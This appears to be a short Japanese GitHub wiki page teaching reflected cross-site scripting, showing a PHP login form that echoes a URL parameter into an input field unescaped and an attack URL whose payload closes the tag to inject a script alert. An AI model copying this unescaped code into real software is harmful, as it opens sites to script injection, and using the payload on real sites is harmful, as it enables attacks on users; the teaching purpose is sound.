クロスサイトスクリプティング 02 - yujitounai/helloworld GitHub Wiki

クロスサイトスクリプティング(XSS)攻撃 1

タグを閉じる必要がある反射型XSS

脆弱なソースコード (PHP)

<form method="get" action="">login<br>
username<input name="user" type="text" value="<?php echo filter_input(INPUT_GET, 'user'); ?>"><br>
password<input name="pass" type="password" value=""><br>
<input type="submit" value="login">
</form>

攻撃方法

xss-02.php?user="><script>alert(1)</script>

⚠️ GitHub.com Fallback ⚠️